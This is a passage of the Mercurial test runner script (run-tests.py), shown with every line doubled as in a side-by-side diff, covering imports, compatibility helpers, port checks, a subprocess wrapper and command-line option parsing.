46 from __future__ import absolute_import, print_function
46 from __future__ import absolute_import, print_function
47
47
48 import argparse
48 import argparse
49 import collections
49 import collections
50 import difflib
50 import difflib
51 import distutils.version as version
51 import distutils.version as version
52 import errno
52 import errno
53 import json
53 import json
54 import multiprocessing
54 import multiprocessing
55 import os
55 import os
56 import platform
56 import platform
57 import random
57 import random
58 import re
58 import re
59 import shutil
59 import shutil
60 import signal
60 import signal
61 import socket
61 import socket
62 import subprocess
62 import subprocess
63 import sys
63 import sys
64 import sysconfig
64 import sysconfig
65 import tempfile
65 import tempfile
66 import threading
66 import threading
67 import time
67 import time
68 import unittest
68 import unittest
69 import uuid
69 import uuid
70 import xml.dom.minidom as minidom
70 import xml.dom.minidom as minidom
71
71
72 try:
72 try:
73 import Queue as queue
73 import Queue as queue
74 except ImportError:
74 except ImportError:
75 import queue
75 import queue
76
76
77 try:
77 try:
78 import shlex
78 import shlex
79
79
80 shellquote = shlex.quote
80 shellquote = shlex.quote
81 except (ImportError, AttributeError):
81 except (ImportError, AttributeError):
82 import pipes
82 import pipes
83
83
84 shellquote = pipes.quote
84 shellquote = pipes.quote
85
85
86 processlock = threading.Lock()
86 processlock = threading.Lock()
87
87
88 pygmentspresent = False
88 pygmentspresent = False
89 # ANSI color is unsupported prior to Windows 10
89 # ANSI color is unsupported prior to Windows 10
90 if os.name != 'nt':
90 if os.name != 'nt':
91 try: # is pygments installed
91 try: # is pygments installed
92 import pygments
92 import pygments
93 import pygments.lexers as lexers
93 import pygments.lexers as lexers
94 import pygments.lexer as lexer
94 import pygments.lexer as lexer
95 import pygments.formatters as formatters
95 import pygments.formatters as formatters
96 import pygments.token as token
96 import pygments.token as token
97 import pygments.style as style
97 import pygments.style as style
98
98
99 pygmentspresent = True
99 pygmentspresent = True
100 difflexer = lexers.DiffLexer()
100 difflexer = lexers.DiffLexer()
101 terminal256formatter = formatters.Terminal256Formatter()
101 terminal256formatter = formatters.Terminal256Formatter()
102 except ImportError:
102 except ImportError:
103 pass
103 pass
104
104
105 if pygmentspresent:
105 if pygmentspresent:
106
106
107 class TestRunnerStyle(style.Style):
107 class TestRunnerStyle(style.Style):
108 default_style = ""
108 default_style = ""
109 skipped = token.string_to_tokentype("Token.Generic.Skipped")
109 skipped = token.string_to_tokentype("Token.Generic.Skipped")
110 failed = token.string_to_tokentype("Token.Generic.Failed")
110 failed = token.string_to_tokentype("Token.Generic.Failed")
111 skippedname = token.string_to_tokentype("Token.Generic.SName")
111 skippedname = token.string_to_tokentype("Token.Generic.SName")
112 failedname = token.string_to_tokentype("Token.Generic.FName")
112 failedname = token.string_to_tokentype("Token.Generic.FName")
113 styles = {
113 styles = {
114 skipped: '#e5e5e5',
114 skipped: '#e5e5e5',
115 skippedname: '#00ffff',
115 skippedname: '#00ffff',
116 failed: '#7f0000',
116 failed: '#7f0000',
117 failedname: '#ff0000',
117 failedname: '#ff0000',
118 }
118 }
119
119
120 class TestRunnerLexer(lexer.RegexLexer):
120 class TestRunnerLexer(lexer.RegexLexer):
121 testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
121 testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
122 tokens = {
122 tokens = {
123 'root': [
123 'root': [
124 (r'^Skipped', token.Generic.Skipped, 'skipped'),
124 (r'^Skipped', token.Generic.Skipped, 'skipped'),
125 (r'^Failed ', token.Generic.Failed, 'failed'),
125 (r'^Failed ', token.Generic.Failed, 'failed'),
126 (r'^ERROR: ', token.Generic.Failed, 'failed'),
126 (r'^ERROR: ', token.Generic.Failed, 'failed'),
127 ],
127 ],
128 'skipped': [
128 'skipped': [
129 (testpattern, token.Generic.SName),
129 (testpattern, token.Generic.SName),
130 (r':.*', token.Generic.Skipped),
130 (r':.*', token.Generic.Skipped),
131 ],
131 ],
132 'failed': [
132 'failed': [
133 (testpattern, token.Generic.FName),
133 (testpattern, token.Generic.FName),
134 (r'(:| ).*', token.Generic.Failed),
134 (r'(:| ).*', token.Generic.Failed),
135 ],
135 ],
136 }
136 }
137
137
138 runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
138 runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
139 runnerlexer = TestRunnerLexer()
139 runnerlexer = TestRunnerLexer()
140
140
141 origenviron = os.environ.copy()
141 origenviron = os.environ.copy()
142
142
143 if sys.version_info > (3, 5, 0):
143 if sys.version_info > (3, 5, 0):
144 PYTHON3 = True
144 PYTHON3 = True
145 xrange = range # we use xrange in one place, and we'd rather not use range
145 xrange = range # we use xrange in one place, and we'd rather not use range
146
146
147 def _sys2bytes(p):
147 def _sys2bytes(p):
148 if p is None:
148 if p is None:
149 return p
149 return p
150 return p.encode('utf-8')
150 return p.encode('utf-8')
151
151
152 def _bytes2sys(p):
152 def _bytes2sys(p):
153 if p is None:
153 if p is None:
154 return p
154 return p
155 return p.decode('utf-8')
155 return p.decode('utf-8')
156
156
157 osenvironb = getattr(os, 'environb', None)
157 osenvironb = getattr(os, 'environb', None)
158 if osenvironb is None:
158 if osenvironb is None:
159 # Windows lacks os.environb, for instance. A proxy over the real thing
159 # Windows lacks os.environb, for instance. A proxy over the real thing
160 # instead of a copy allows the environment to be updated via bytes on
160 # instead of a copy allows the environment to be updated via bytes on
161 # all platforms.
161 # all platforms.
162 class environbytes(object):
162 class environbytes(object):
163 def __init__(self, strenv):
163 def __init__(self, strenv):
164 self.__len__ = strenv.__len__
164 self.__len__ = strenv.__len__
165 self.clear = strenv.clear
165 self.clear = strenv.clear
166 self._strenv = strenv
166 self._strenv = strenv
167
167
168 def __getitem__(self, k):
168 def __getitem__(self, k):
169 v = self._strenv.__getitem__(_bytes2sys(k))
169 v = self._strenv.__getitem__(_bytes2sys(k))
170 return _sys2bytes(v)
170 return _sys2bytes(v)
171
171
172 def __setitem__(self, k, v):
172 def __setitem__(self, k, v):
173 self._strenv.__setitem__(_bytes2sys(k), _bytes2sys(v))
173 self._strenv.__setitem__(_bytes2sys(k), _bytes2sys(v))
174
174
175 def __delitem__(self, k):
175 def __delitem__(self, k):
176 self._strenv.__delitem__(_bytes2sys(k))
176 self._strenv.__delitem__(_bytes2sys(k))
177
177
178 def __contains__(self, k):
178 def __contains__(self, k):
179 return self._strenv.__contains__(_bytes2sys(k))
179 return self._strenv.__contains__(_bytes2sys(k))
180
180
181 def __iter__(self):
181 def __iter__(self):
182 return iter([_sys2bytes(k) for k in iter(self._strenv)])
182 return iter([_sys2bytes(k) for k in iter(self._strenv)])
183
183
184 def get(self, k, default=None):
184 def get(self, k, default=None):
185 v = self._strenv.get(_bytes2sys(k), _bytes2sys(default))
185 v = self._strenv.get(_bytes2sys(k), _bytes2sys(default))
186 return _sys2bytes(v)
186 return _sys2bytes(v)
187
187
188 def pop(self, k, default=None):
188 def pop(self, k, default=None):
189 v = self._strenv.pop(_bytes2sys(k), _bytes2sys(default))
189 v = self._strenv.pop(_bytes2sys(k), _bytes2sys(default))
190 return _sys2bytes(v)
190 return _sys2bytes(v)
191
191
192 osenvironb = environbytes(os.environ)
192 osenvironb = environbytes(os.environ)
193
193
194 getcwdb = getattr(os, 'getcwdb')
194 getcwdb = getattr(os, 'getcwdb')
195 if not getcwdb or os.name == 'nt':
195 if not getcwdb or os.name == 'nt':
196 getcwdb = lambda: _sys2bytes(os.getcwd())
196 getcwdb = lambda: _sys2bytes(os.getcwd())
197
197
198 elif sys.version_info >= (3, 0, 0):
198 elif sys.version_info >= (3, 0, 0):
199 print(
199 print(
200 '%s is only supported on Python 3.5+ and 2.7, not %s'
200 '%s is only supported on Python 3.5+ and 2.7, not %s'
201 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
201 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
202 )
202 )
203 sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
203 sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
204 else:
204 else:
205 PYTHON3 = False
205 PYTHON3 = False
206
206
207 # In python 2.x, path operations are generally done using
207 # In python 2.x, path operations are generally done using
208 # bytestrings by default, so we don't have to do any extra
208 # bytestrings by default, so we don't have to do any extra
209 # fiddling there. We define the wrapper functions anyway just to
209 # fiddling there. We define the wrapper functions anyway just to
210 # help keep code consistent between platforms.
210 # help keep code consistent between platforms.
211 def _sys2bytes(p):
211 def _sys2bytes(p):
212 return p
212 return p
213
213
214 _bytes2sys = _sys2bytes
214 _bytes2sys = _sys2bytes
215 osenvironb = os.environ
215 osenvironb = os.environ
216 getcwdb = os.getcwd
216 getcwdb = os.getcwd
217
217
218 # For Windows support
218 # For Windows support
219 wifexited = getattr(os, "WIFEXITED", lambda x: False)
219 wifexited = getattr(os, "WIFEXITED", lambda x: False)
220
220
221 # Whether to use IPv6
221 # Whether to use IPv6
222 def checksocketfamily(name, port=20058):
222 def checksocketfamily(name, port=20058):
223 """return true if we can listen on localhost using family=name
223 """return true if we can listen on localhost using family=name
224
224
225 name should be either 'AF_INET', or 'AF_INET6'.
225 name should be either 'AF_INET', or 'AF_INET6'.
226 port being used is okay - EADDRINUSE is considered as successful.
226 port being used is okay - EADDRINUSE is considered as successful.
227 """
227 """
228 family = getattr(socket, name, None)
228 family = getattr(socket, name, None)
229 if family is None:
229 if family is None:
230 return False
230 return False
231 try:
231 try:
232 s = socket.socket(family, socket.SOCK_STREAM)
232 s = socket.socket(family, socket.SOCK_STREAM)
233 s.bind(('localhost', port))
233 s.bind(('localhost', port))
234 s.close()
234 s.close()
235 return True
235 return True
236 except socket.error as exc:
236 except socket.error as exc:
237 if exc.errno == errno.EADDRINUSE:
237 if exc.errno == errno.EADDRINUSE:
238 return True
238 return True
239 elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
239 elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
240 return False
240 return False
241 else:
241 else:
242 raise
242 raise
243 else:
243 else:
244 return False
244 return False
245
245
246
246
247 # useipv6 will be set by parseargs
247 # useipv6 will be set by parseargs
248 useipv6 = None
248 useipv6 = None
249
249
250
250
251 def checkportisavailable(port):
251 def checkportisavailable(port):
252 """return true if a port seems free to bind on localhost"""
252 """return true if a port seems free to bind on localhost"""
253 if useipv6:
253 if useipv6:
254 family = socket.AF_INET6
254 family = socket.AF_INET6
255 else:
255 else:
256 family = socket.AF_INET
256 family = socket.AF_INET
257 try:
257 try:
258 s = socket.socket(family, socket.SOCK_STREAM)
258 s = socket.socket(family, socket.SOCK_STREAM)
259 s.bind(('localhost', port))
259 s.bind(('localhost', port))
260 s.close()
260 s.close()
261 return True
261 return True
262 except socket.error as exc:
262 except socket.error as exc:
263 if exc.errno not in (
263 if exc.errno not in (
264 errno.EADDRINUSE,
264 errno.EADDRINUSE,
265 errno.EADDRNOTAVAIL,
265 errno.EADDRNOTAVAIL,
266 errno.EPROTONOSUPPORT,
266 errno.EPROTONOSUPPORT,
267 ):
267 ):
268 raise
268 raise
269 return False
269 return False
270
270
271
271
272 closefds = os.name == 'posix'
272 closefds = os.name == 'posix'
273
273
274
274
275 def Popen4(cmd, wd, timeout, env=None):
275 def Popen4(cmd, wd, timeout, env=None):
276 processlock.acquire()
276 processlock.acquire()
277 p = subprocess.Popen(
277 p = subprocess.Popen(
278 _bytes2sys(cmd),
278 _bytes2sys(cmd),
279 shell=True,
279 shell=True,
280 bufsize=-1,
280 bufsize=-1,
281 cwd=_bytes2sys(wd),
281 cwd=_bytes2sys(wd),
282 env=env,
282 env=env,
283 close_fds=closefds,
283 close_fds=closefds,
284 stdin=subprocess.PIPE,
284 stdin=subprocess.PIPE,
285 stdout=subprocess.PIPE,
285 stdout=subprocess.PIPE,
286 stderr=subprocess.STDOUT,
286 stderr=subprocess.STDOUT,
287 )
287 )
288 processlock.release()
288 processlock.release()
289
289
290 p.fromchild = p.stdout
290 p.fromchild = p.stdout
291 p.tochild = p.stdin
291 p.tochild = p.stdin
292 p.childerr = p.stderr
292 p.childerr = p.stderr
293
293
294 p.timeout = False
294 p.timeout = False
295 if timeout:
295 if timeout:
296
296
297 def t():
297 def t():
298 start = time.time()
298 start = time.time()
299 while time.time() - start < timeout and p.returncode is None:
299 while time.time() - start < timeout and p.returncode is None:
300 time.sleep(0.1)
300 time.sleep(0.1)
301 p.timeout = True
301 p.timeout = True
302 if p.returncode is None:
302 if p.returncode is None:
303 terminate(p)
303 terminate(p)
304
304
305 threading.Thread(target=t).start()
305 threading.Thread(target=t).start()
306
306
307 return p
307 return p
308
308
309
309
310 if sys.executable:
310 if sys.executable:
311 sysexecutable = sys.executable
311 sysexecutable = sys.executable
312 elif os.environ.get('PYTHONEXECUTABLE'):
312 elif os.environ.get('PYTHONEXECUTABLE'):
313 sysexecutable = os.environ['PYTHONEXECUTABLE']
313 sysexecutable = os.environ['PYTHONEXECUTABLE']
314 elif os.environ.get('PYTHON'):
314 elif os.environ.get('PYTHON'):
315 sysexecutable = os.environ['PYTHON']
315 sysexecutable = os.environ['PYTHON']
316 else:
316 else:
317 raise AssertionError('Could not find Python interpreter')
317 raise AssertionError('Could not find Python interpreter')
318
318
319 PYTHON = _sys2bytes(sysexecutable.replace('\\', '/'))
319 PYTHON = _sys2bytes(sysexecutable.replace('\\', '/'))
320 IMPL_PATH = b'PYTHONPATH'
320 IMPL_PATH = b'PYTHONPATH'
321 if 'java' in sys.platform:
321 if 'java' in sys.platform:
322 IMPL_PATH = b'JYTHONPATH'
322 IMPL_PATH = b'JYTHONPATH'
323
323
324 default_defaults = {
324 default_defaults = {
325 'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
325 'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
326 'timeout': ('HGTEST_TIMEOUT', 180),
326 'timeout': ('HGTEST_TIMEOUT', 180),
327 'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
327 'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
328 'port': ('HGTEST_PORT', 20059),
328 'port': ('HGTEST_PORT', 20059),
329 'shell': ('HGTEST_SHELL', 'sh'),
329 'shell': ('HGTEST_SHELL', 'sh'),
330 }
330 }
331
331
332 defaults = default_defaults.copy()
332 defaults = default_defaults.copy()
333
333
334
334
335 def canonpath(path):
335 def canonpath(path):
336 return os.path.realpath(os.path.expanduser(path))
336 return os.path.realpath(os.path.expanduser(path))
337
337
338
338
339 def parselistfiles(files, listtype, warn=True):
339 def parselistfiles(files, listtype, warn=True):
340 entries = dict()
340 entries = dict()
341 for filename in files:
341 for filename in files:
342 try:
342 try:
343 path = os.path.expanduser(os.path.expandvars(filename))
343 path = os.path.expanduser(os.path.expandvars(filename))
344 f = open(path, "rb")
344 f = open(path, "rb")
345 except IOError as err:
345 except IOError as err:
346 if err.errno != errno.ENOENT:
346 if err.errno != errno.ENOENT:
347 raise
347 raise
348 if warn:
348 if warn:
349 print("warning: no such %s file: %s" % (listtype, filename))
349 print("warning: no such %s file: %s" % (listtype, filename))
350 continue
350 continue
351
351
352 for line in f.readlines():
352 for line in f.readlines():
353 line = line.split(b'#', 1)[0].strip()
353 line = line.split(b'#', 1)[0].strip()
354 if line:
354 if line:
355 entries[line] = filename
355 entries[line] = filename
356
356
357 f.close()
357 f.close()
358 return entries
358 return entries
359
359
360
360
361 def parsettestcases(path):
361 def parsettestcases(path):
362 """read a .t test file, return a set of test case names
362 """read a .t test file, return a set of test case names
363
363
364 If path does not exist, return an empty set.
364 If path does not exist, return an empty set.
365 """
365 """
366 cases = []
366 cases = []
367 try:
367 try:
368 with open(path, 'rb') as f:
368 with open(path, 'rb') as f:
369 for l in f:
369 for l in f:
370 if l.startswith(b'#testcases '):
370 if l.startswith(b'#testcases '):
371 cases.append(sorted(l[11:].split()))
371 cases.append(sorted(l[11:].split()))
372 except IOError as ex:
372 except IOError as ex:
373 if ex.errno != errno.ENOENT:
373 if ex.errno != errno.ENOENT:
374 raise
374 raise
375 return cases
375 return cases
376
376
377
377
378 def getparser():
378 def getparser():
379 """Obtain the OptionParser used by the CLI."""
379 """Obtain the OptionParser used by the CLI."""
380 parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')
380 parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')
381
381
382 selection = parser.add_argument_group('Test Selection')
382 selection = parser.add_argument_group('Test Selection')
383 selection.add_argument(
383 selection.add_argument(
384 '--allow-slow-tests',
384 '--allow-slow-tests',
385 action='store_true',
385 action='store_true',
386 help='allow extremely slow tests',
386 help='allow extremely slow tests',
387 )
387 )
388 selection.add_argument(
388 selection.add_argument(
389 "--blacklist",
389 "--blacklist",
390 action="append",
390 action="append",
391 help="skip tests listed in the specified blacklist file",
391 help="skip tests listed in the specified blacklist file",
392 )
392 )
393 selection.add_argument(
393 selection.add_argument(
394 "--changed",
394 "--changed",
395 help="run tests that are changed in parent rev or working directory",
395 help="run tests that are changed in parent rev or working directory",
396 )
396 )
397 selection.add_argument(
397 selection.add_argument(
398 "-k", "--keywords", help="run tests matching keywords"
398 "-k", "--keywords", help="run tests matching keywords"
399 )
399 )
400 selection.add_argument(
400 selection.add_argument(
401 "-r", "--retest", action="store_true", help="retest failed tests"
401 "-r", "--retest", action="store_true", help="retest failed tests"
402 )
402 )
403 selection.add_argument(
403 selection.add_argument(
404 "--test-list",
404 "--test-list",
405 action="append",
405 action="append",
406 help="read tests to run from the specified file",
406 help="read tests to run from the specified file",
407 )
407 )
408 selection.add_argument(
408 selection.add_argument(
409 "--whitelist",
409 "--whitelist",
410 action="append",
410 action="append",
411 help="always run tests listed in the specified whitelist file",
411 help="always run tests listed in the specified whitelist file",
412 )
412 )
413 selection.add_argument(
413 selection.add_argument(
414 'tests', metavar='TESTS', nargs='*', help='Tests to run'
414 'tests', metavar='TESTS', nargs='*', help='Tests to run'
415 )
415 )
416
416
417 harness = parser.add_argument_group('Test Harness Behavior')
417 harness = parser.add_argument_group('Test Harness Behavior')
418 harness.add_argument(
418 harness.add_argument(
419 '--bisect-repo',
419 '--bisect-repo',
420 metavar='bisect_repo',
420 metavar='bisect_repo',
421 help=(
421 help=(
422 "Path of a repo to bisect. Use together with " "--known-good-rev"
422 "Path of a repo to bisect. Use together with " "--known-good-rev"
423 ),
423 ),
424 )
424 )
425 harness.add_argument(
425 harness.add_argument(
426 "-d",
426 "-d",
427 "--debug",
427 "--debug",
428 action="store_true",
428 action="store_true",
429 help="debug mode: write output of test scripts to console"
429 help="debug mode: write output of test scripts to console"
430 " rather than capturing and diffing it (disables timeout)",
430 " rather than capturing and diffing it (disables timeout)",
431 )
431 )
432 harness.add_argument(
432 harness.add_argument(
433 "-f",
433 "-f",
434 "--first",
434 "--first",
435 action="store_true",
435 action="store_true",
436 help="exit on the first test failure",
436 help="exit on the first test failure",
437 )
437 )
438 harness.add_argument(
438 harness.add_argument(
439 "-i",
439 "-i",
440 "--interactive",
440 "--interactive",
441 action="store_true",
441 action="store_true",
442 help="prompt to accept changed output",
442 help="prompt to accept changed output",
443 )
443 )
444 harness.add_argument(
444 harness.add_argument(
445 "-j",
445 "-j",
446 "--jobs",
446 "--jobs",
447 type=int,
447 type=int,
448 help="number of jobs to run in parallel"
448 help="number of jobs to run in parallel"
449 " (default: $%s or %d)" % defaults['jobs'],
449 " (default: $%s or %d)" % defaults['jobs'],
450 )
450 )
451 harness.add_argument(
451 harness.add_argument(
452 "--keep-tmpdir",
452 "--keep-tmpdir",
453 action="store_true",
453 action="store_true",
454 help="keep temporary directory after running tests",
454 help="keep temporary directory after running tests",
455 )
455 )
456 harness.add_argument(
456 harness.add_argument(
457 '--known-good-rev',
457 '--known-good-rev',
458 metavar="known_good_rev",
458 metavar="known_good_rev",
459 help=(
459 help=(
460 "Automatically bisect any failures using this "
460 "Automatically bisect any failures using this "
461 "revision as a known-good revision."
461 "revision as a known-good revision."
462 ),
462 ),
463 )
463 )
464 harness.add_argument(
464 harness.add_argument(
465 "--list-tests",
465 "--list-tests",
466 action="store_true",
466 action="store_true",
467 help="list tests instead of running them",
467 help="list tests instead of running them",
468 )
468 )
469 harness.add_argument(
469 harness.add_argument(
470 "--loop", action="store_true", help="loop tests repeatedly"
470 "--loop", action="store_true", help="loop tests repeatedly"
471 )
471 )
472 harness.add_argument(
472 harness.add_argument(
473 '--random', action="store_true", help='run tests in random order'
473 '--random', action="store_true", help='run tests in random order'
474 )
474 )
475 harness.add_argument(
475 harness.add_argument(
476 '--order-by-runtime',
476 '--order-by-runtime',
477 action="store_true",
477 action="store_true",
478 help='run slowest tests first, according to .testtimes',
478 help='run slowest tests first, according to .testtimes',
479 )
479 )
480 harness.add_argument(
480 harness.add_argument(
481 "-p",
481 "-p",
482 "--port",
482 "--port",
483 type=int,
483 type=int,
484 help="port on which servers should listen"
484 help="port on which servers should listen"
485 " (default: $%s or %d)" % defaults['port'],
485 " (default: $%s or %d)" % defaults['port'],
486 )
486 )
487 harness.add_argument(
487 harness.add_argument(
488 '--profile-runner',
488 '--profile-runner',
489 action='store_true',
489 action='store_true',
490 help='run statprof on run-tests',
490 help='run statprof on run-tests',
491 )
491 )
492 harness.add_argument(
492 harness.add_argument(
493 "-R", "--restart", action="store_true", help="restart at last error"
493 "-R", "--restart", action="store_true", help="restart at last error"
494 )
494 )
495 harness.add_argument(
495 harness.add_argument(
496 "--runs-per-test",
496 "--runs-per-test",
497 type=int,
497 type=int,
498 dest="runs_per_test",
498 dest="runs_per_test",
499 help="run each test N times (default=1)",
499 help="run each test N times (default=1)",
500 default=1,
500 default=1,
501 )
501 )
502 harness.add_argument(
502 harness.add_argument(
503 "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
503 "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
504 )
504 )
505 harness.add_argument(
505 harness.add_argument(
506 '--showchannels', action='store_true', help='show scheduling channels'
506 '--showchannels', action='store_true', help='show scheduling channels'
507 )
507 )
508 harness.add_argument(
508 harness.add_argument(
509 "--slowtimeout",
509 "--slowtimeout",
510 type=int,
510 type=int,
511 help="kill errant slow tests after SLOWTIMEOUT seconds"
511 help="kill errant slow tests after SLOWTIMEOUT seconds"
512 " (default: $%s or %d)" % defaults['slowtimeout'],
512 " (default: $%s or %d)" % defaults['slowtimeout'],
513 )
513 )
514 harness.add_argument(
514 harness.add_argument(
515 "-t",
515 "-t",
516 "--timeout",
516 "--timeout",
517 type=int,
517 type=int,
518 help="kill errant tests after TIMEOUT seconds"
518 help="kill errant tests after TIMEOUT seconds"
519 " (default: $%s or %d)" % defaults['timeout'],
519 " (default: $%s or %d)" % defaults['timeout'],
520 )
520 )
521 harness.add_argument(
521 harness.add_argument(
522 "--tmpdir",
522 "--tmpdir",
523 help="run tests in the given temporary directory"
523 help="run tests in the given temporary directory"
524 " (implies --keep-tmpdir)",
524 " (implies --keep-tmpdir)",
525 )
525 )
526 harness.add_argument(
526 harness.add_argument(
527 "-v", "--verbose", action="store_true", help="output verbose messages"
527 "-v", "--verbose", action="store_true", help="output verbose messages"
528 )
528 )
529
529
530 hgconf = parser.add_argument_group('Mercurial Configuration')
530 hgconf = parser.add_argument_group('Mercurial Configuration')
531 hgconf.add_argument(
531 hgconf.add_argument(
532 "--chg",
532 "--chg",
533 action="store_true",
533 action="store_true",
534 help="install and use chg wrapper in place of hg",
534 help="install and use chg wrapper in place of hg",
535 )
535 )
536 hgconf.add_argument(
536 hgconf.add_argument(
537 "--chg-debug", action="store_true", help="show chg debug logs",
537 "--chg-debug", action="store_true", help="show chg debug logs",
538 )
538 )
539 hgconf.add_argument("--compiler", help="compiler to build with")
539 hgconf.add_argument("--compiler", help="compiler to build with")
540 hgconf.add_argument(
540 hgconf.add_argument(
541 '--extra-config-opt',
541 '--extra-config-opt',
542 action="append",
542 action="append",
543 default=[],
543 default=[],
544 help='set the given config opt in the test hgrc',
544 help='set the given config opt in the test hgrc',
545 )
545 )
546 hgconf.add_argument(
546 hgconf.add_argument(
547 "-l",
547 "-l",
548 "--local",
548 "--local",
549 action="store_true",
549 action="store_true",
550 help="shortcut for --with-hg=<testdir>/../hg, "
550 help="shortcut for --with-hg=<testdir>/../hg, "
551 "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
551 "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
552 )
552 )
553 hgconf.add_argument(
553 hgconf.add_argument(
554 "--ipv6",
554 "--ipv6",
555 action="store_true",
555 action="store_true",
556 help="prefer IPv6 to IPv4 for network related tests",
556 help="prefer IPv6 to IPv4 for network related tests",
557 )
557 )
558 hgconf.add_argument(
558 hgconf.add_argument(
559 "--pure",
559 "--pure",
560 action="store_true",
560 action="store_true",
561 help="use pure Python code instead of C extensions",
561 help="use pure Python code instead of C extensions",
562 )
562 )
563 hgconf.add_argument(
563 hgconf.add_argument(
564 "--rust",
564 "--rust",
565 action="store_true",
565 action="store_true",
566 help="use Rust code alongside C extensions",
566 help="use Rust code alongside C extensions",
567 )
567 )
568 hgconf.add_argument(
568 hgconf.add_argument(
569 "--no-rust",
569 "--no-rust",
570 action="store_true",
570 action="store_true",
571 help="do not use Rust code even if compiled",
571 help="do not use Rust code even if compiled",
572 )
572 )
573 hgconf.add_argument(
573 hgconf.add_argument(
574 "--with-chg",
574 "--with-chg",
575 metavar="CHG",
575 metavar="CHG",
576 help="use specified chg wrapper in place of hg",
576 help="use specified chg wrapper in place of hg",
577 )
577 )
578 hgconf.add_argument(
578 hgconf.add_argument(
579 "--with-hg",
579 "--with-hg",
580 metavar="HG",
580 metavar="HG",
581 help="test using specified hg script rather than a "
581 help="test using specified hg script rather than a "
582 "temporary installation",
582 "temporary installation",
583 )
583 )
584
584
585 reporting = parser.add_argument_group('Results Reporting')
585 reporting = parser.add_argument_group('Results Reporting')
586 reporting.add_argument(
586 reporting.add_argument(
587 "-C",
587 "-C",
588 "--annotate",
588 "--annotate",
589 action="store_true",
589 action="store_true",
590 help="output files annotated with coverage",
590 help="output files annotated with coverage",
591 )
591 )
592 reporting.add_argument(
592 reporting.add_argument(
593 "--color",
593 "--color",
594 choices=["always", "auto", "never"],
594 choices=["always", "auto", "never"],
595 default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
595 default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
596 help="colorisation: always|auto|never (default: auto)",
596 help="colorisation: always|auto|never (default: auto)",
597 )
597 )
598 reporting.add_argument(
598 reporting.add_argument(
599 "-c",
599 "-c",
600 "--cover",
600 "--cover",
601 action="store_true",
601 action="store_true",
602 help="print a test coverage report",
602 help="print a test coverage report",
603 )
603 )
604 reporting.add_argument(
604 reporting.add_argument(
605 '--exceptions',
605 '--exceptions',
606 action='store_true',
606 action='store_true',
607 help='log all exceptions and generate an exception report',
607 help='log all exceptions and generate an exception report',
608 )
608 )
609 reporting.add_argument(
609 reporting.add_argument(
610 "-H",
610 "-H",
611 "--htmlcov",
611 "--htmlcov",
612 action="store_true",
612 action="store_true",
613 help="create an HTML report of the coverage of the files",
613 help="create an HTML report of the coverage of the files",
614 )
614 )
615 reporting.add_argument(
615 reporting.add_argument(
616 "--json",
616 "--json",
617 action="store_true",
617 action="store_true",
618 help="store test result data in 'report.json' file",
618 help="store test result data in 'report.json' file",
619 )
619 )
620 reporting.add_argument(
620 reporting.add_argument(
621 "--outputdir",
621 "--outputdir",
622 help="directory to write error logs to (default=test directory)",
622 help="directory to write error logs to (default=test directory)",
623 )
623 )
624 reporting.add_argument(
624 reporting.add_argument(
625 "-n", "--nodiff", action="store_true", help="skip showing test changes"
625 "-n", "--nodiff", action="store_true", help="skip showing test changes"
626 )
626 )
627 reporting.add_argument(
627 reporting.add_argument(
628 "-S",
628 "-S",
629 "--noskips",
629 "--noskips",
630 action="store_true",
630 action="store_true",
631 help="don't report skip tests verbosely",
631 help="don't report skip tests verbosely",
632 )
632 )
633 reporting.add_argument(
633 reporting.add_argument(
634 "--time", action="store_true", help="time how long each test takes"
634 "--time", action="store_true", help="time how long each test takes"
635 )
635 )
636 reporting.add_argument("--view", help="external diff viewer")
636 reporting.add_argument("--view", help="external diff viewer")
637 reporting.add_argument(
637 reporting.add_argument(
638 "--xunit", help="record xunit results at specified path"
638 "--xunit", help="record xunit results at specified path"
639 )
639 )
640
640
641 for option, (envvar, default) in defaults.items():
641 for option, (envvar, default) in defaults.items():
642 defaults[option] = type(default)(os.environ.get(envvar, default))
642 defaults[option] = type(default)(os.environ.get(envvar, default))
643 parser.set_defaults(**defaults)
643 parser.set_defaults(**defaults)
644
644
645 return parser
645 return parser
646
646
647
647
648 def parseargs(args, parser):
648 def parseargs(args, parser):
649 """Parse arguments with our OptionParser and validate results."""
649 """Parse arguments with our OptionParser and validate results."""
650 options = parser.parse_args(args)
650 options = parser.parse_args(args)
651
651
652 # jython is always pure
652 # jython is always pure
653 if 'java' in sys.platform or '__pypy__' in sys.modules:
653 if 'java' in sys.platform or '__pypy__' in sys.modules:
654 options.pure = True
654 options.pure = True
655
655
656 if platform.python_implementation() != 'CPython' and options.rust:
656 if platform.python_implementation() != 'CPython' and options.rust:
657 parser.error('Rust extensions are only available with CPython')
657 parser.error('Rust extensions are only available with CPython')
658
658
659 if options.pure and options.rust:
659 if options.pure and options.rust:
660 parser.error('--rust cannot be used with --pure')
660 parser.error('--rust cannot be used with --pure')
661
661
662 if options.rust and options.no_rust:
662 if options.rust and options.no_rust:
663 parser.error('--rust cannot be used with --no-rust')
663 parser.error('--rust cannot be used with --no-rust')
664
664
665 if options.local:
665 if options.local:
666 if options.with_hg or options.with_chg:
666 if options.with_hg or options.with_chg:
667 parser.error('--local cannot be used with --with-hg or --with-chg')
667 parser.error('--local cannot be used with --with-hg or --with-chg')
668 testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
